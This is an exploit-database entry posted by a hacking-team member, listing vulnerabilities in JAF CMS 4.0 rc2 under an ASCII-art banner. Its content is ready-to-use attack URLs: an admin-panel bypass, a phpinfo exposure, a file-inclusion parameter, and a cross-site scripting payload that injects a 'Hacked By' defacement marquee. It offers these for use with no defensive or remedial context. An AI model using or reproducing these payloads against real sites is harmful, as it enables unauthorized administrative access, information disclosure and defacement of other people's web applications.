JAF CMS 4.0 rc2 Mullti Vulnerability

2010-11-15T00:00:00
ID 1337DAY-ID-14843
Type zdt
Reporter indoushka
Modified 2010-11-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================
JAF CMS 4.0 rc2 Mullti Vulnerability
====================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://jaf-cms.sourceforge.net/

# Date: 2010-07-27 

# Author : indoushka 

# Inj3ct0r Team http://77.120.101.55/ 

# Thanks to : Dz-Ghost Team

# Contact : http://www.appinsecurity.com

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# JAF CMS 4.0 rc2 by pass Vulnerability
-------------

http://127.0.0.1/jaf/admin/adminmenu.php#

http://127.0.0.1/jaf/module/log/vislog.php?action=phpinfo

# JAF CMS 4.0 rc2 File inclusion Vulnerability
-------------

http://127.0.0.1/jaf/module/forum/inc/commentwin.php?id=[Ev!l]

# JAF CMS 4.0 rc2 Xss Html Sql Vulnerability
 
-------------

http://127.0.0.1/jaf/index.php?page=forum&category=general&view_type=topic&id=1%3E%22%3E%3Cmarquee%3E%3Cfont%20color=red%20size=15%3EHacked%20By%20indoushka%3C/font%3E%3C/marquee%3E



#  0day.today [2016-04-19]  #